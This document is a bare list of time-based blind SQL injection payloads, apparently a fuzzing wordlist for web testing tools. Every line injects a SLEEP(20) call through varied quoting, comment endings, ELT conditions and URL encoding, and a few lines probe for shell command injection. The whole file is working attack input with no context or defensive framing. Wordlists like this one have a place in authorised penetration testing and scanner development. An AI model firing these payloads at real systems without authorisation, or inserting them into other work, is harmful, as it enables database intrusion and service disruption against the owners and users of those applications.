1 AND (SELECT 1 FROM (SELECT SLEEP(20))A)
1 AND (SELECT 1 FROM (SELECT(SLEEP(20)))A)
' AND SLEEP(20) AND '1'='1
' AND SLEEP(20)
' AnD SLEEP(20) ANd '1
AnD SLEEP(20)
OR BLIND: or sleep(20)--
OR BLIND: or sleep(20)
OR BLIND: or sleep(20)='
OR BLIND: or sleep(20)="
OR BLIND: or sleep(20)#
OR BLIND: or SLEEP(20)
OR BLIND: or SLEEP(20)='
OR BLIND: or SLEEP(20)="
OR BLIND: or SLEEP(20)#
OR BLIND: or SLEEP(20)--
OR BLIND: or SELECT SLEEP(20); #
OR BLIND: or SLEEP(20) AND '1'='1
OR BLIND: or SLEEP(20) AND '1
or sleep(20)#
)) or sleep(20)='
1)) or sleep(20)#
")) or sleep(20)="
%20$(sleep%2020)
%20'sleep%2020'
' AND ELT(1337=1337,SLEEP(20))
" AND ELT(1337=1337,SLEEP(20))
') AND ELT(1337=1337,SLEEP(20))
")) AND ELT(1337=1337,SLEEP(20))
' AND ELT(1337=1337,SLEEP(20)) AND '1337'='1337
' AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337'='1337
' AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337' LIKE '1337
' AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
1 and sleep(20)
(SELECT SLEEP(20))
', ''),/test/%26%26%09sLeEp(20)%09--+
', sleep(20))-- 1337
')); or sleep(20)='
'); or sleep(20)='
') or sleep(20)='
'); or sleep(20)
')); or sleep(20)
') OR SLEEP(20)#
'); OR SLEEP(20)#
') OR SLEEP(20)
'); OR SLEEP(20)
') AND SLEEP(20)#
'); AND SLEEP(20)#
'); AND SLEEP(20)
') AND SLEEP(20)
and sleep(20)#
AND SLEEP(20)
OR SLEEP(20)
sleep(20)
"); or sleep(20)#
%20'))%20OR%20(('test'%3D'test
%20or%20sleep%20(20)
%20or%20sleep(20)--
%20or%20sleep(20)#
%20or%20sleep(20)='
%20or%20sleep(20)="
%20or%20sleep(20)
%20and%20sleep(20)
%20and%20sleep(20)--
%20and%20sleep(20)#
%20and%20sleep(20)='
%20and%20sleep(20)="
%20AND%20SLEEP(20)
%20AND%20SLEEP(20)--
%20AND%20SLEEP(20)#
%20AND%20SLEEP(20)='
%20AND%20SLEEP(20)="
%20AND%20SLEEP(20)/*
%20and%20(select*from(select(sleep(20)))a)
%20and%20sleep(20)%23
%20AND%20SLEEP(20)%23
%20AND%20SLEEP(20)%23
